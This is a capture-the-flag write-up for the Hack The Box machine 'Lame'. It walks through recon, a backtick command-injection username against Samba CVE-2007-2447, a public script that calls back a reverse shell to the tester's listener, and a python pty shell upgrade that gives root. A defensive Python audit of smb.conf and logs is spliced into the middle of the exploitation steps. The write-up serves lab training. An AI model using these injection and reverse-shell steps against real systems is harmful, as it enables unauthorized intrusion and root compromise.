🕵 HTB-Writeup : LAME

Recon

Port and service detection with nmap: nmap -A 10.10.10.3 -Pn

We retrieve the following information:

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.16.6
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

Let's try to connect anonymously on port 21 (FTP):

ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:steels): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Basic commands such as ls fail with errors, so we restart ftp with -p to use passive mode.

There is no directory or file on the FTP server, but the vsFTPd version in use (2.3.4) is known to be vulnerable to RCE through a backdoor that opens a shell on port 6200. This exploit can be used against the server: https://www.exploit-db.com/exploits/49757

The exploit does not work against this machine: nothing is listening on port 6200.

Let's explore port 445, the SMB server.

We try to connect with smbclient but get an error: protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED

The server only speaks the old SMB1 dialect, so we just have to lower the client minimum protocol to NT1 in /etc/samba/smb.conf (client min protocol = NT1).

We try again with smbclient:

Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))

Nothing really interesting in the shares themselves, but the IPC$ comment reveals the exact version, Samba 3.0.20-Debian, so we can check for known vulnerabilities in Samba 3.X.

Exploitation

In theory, our SMB server is vulnerable to CVE-2007-2447. Arbitrary commands can be executed by injecting them into the username at connection time: -U "/=`nohup mkdir /tmp/foo`". We are going to use this script to gain a reverse shell: https://raw.githubusercontent.com/amriunix/CVE-2007-2447/master/usermap_script.py

$ python3 usermap_script.py 10.10.10.3 445 10.10.16.6 4321
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
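As an added defender-side check (not part of the original writeup): CVE-2007-2447 is only reachable when Samba's "username map script" option is set, and the injection rides on shell metacharacters in the username. The Python below audits an smb.conf for that option and flags smbd authentication log lines whose username carries such characters; the script path in the sample config and the log line shape are assumptions constructed for the example.

```python
import re

# Shell metacharacters that have no place in an SMB username; the
# CVE-2007-2447 injection shown above relies on the backtick form.
_METACHARS = re.compile(r"[`;|&]|\$\(")

def suspicious_username(user):
    """True if the username carries shell metacharacters."""
    return bool(_METACHARS.search(user))

def audit_smb_conf(conf_text):
    """Flag the setting that makes CVE-2007-2447 reachable: a non-empty
    'username map script'. Returns a list of finding strings."""
    findings = []
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;[" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key = " ".join(key.split()).lower()   # smb.conf keys ignore case/spacing
        if key == "username map script" and value.strip():
            findings.append("username map script is set: " + value.strip())
    return findings

def scan_auth_log(lines):
    """Return usernames from smbd authentication lines that look injected.
    Line shape is assumed (constructed to mimic Samba 3 log.smbd entries)."""
    hits = []
    for line in lines:
        m = re.search(r"Authentication for user \[(.*?)\]", line)
        if m and suspicious_username(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed sample input: a config with the risky option (placeholder path)
# and two log lines, one benign and one carrying the page's injection string.
SAMPLE_CONF = """[global]
   workgroup = WORKGROUP
   ; placeholder path, constructed for this example
   username map script = /etc/samba/scripts/mapusers.sh
"""
SAMPLE_LOG = [
    "check_ntlm_password:  Authentication for user [steels] -> [steels] FAILED",
    "check_ntlm_password:  Authentication for user [/=`nohup mkdir /tmp/foo`]"
    " -> [/=`nohup mkdir /tmp/foo`] FAILED",
]
```

Run audit_smb_conf over the live smb.conf and scan_auth_log over log.smbd (log level 2 or higher records the authentication lines) to get both the configuration finding and any injected usernames.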

Netcat side:

$ nc -nvlp 4321
Listening on 0.0.0.0 4321
Connection received on 10.10.10.3 59071
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
initrd.img.old
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old

Post-exploitation

We can upgrade our shell to a proper TTY with python's pty module: python -c 'import pty; pty.spawn("/bin/bash")'

root@lame:/$ id
uid=0(root) gid=0(root) groups=0(root)

The shell is already running as root (uid=0), since the Samba daemon itself runs as root, so we can now retrieve both the user flag and the root flag.

Tags

Easy, Internal, Network, SAMBA, Penetration Tester Level 1, Remote Code Execution, CVE-2007-2447, Public Vulnerabilities, CVE Exploitation, Security Tools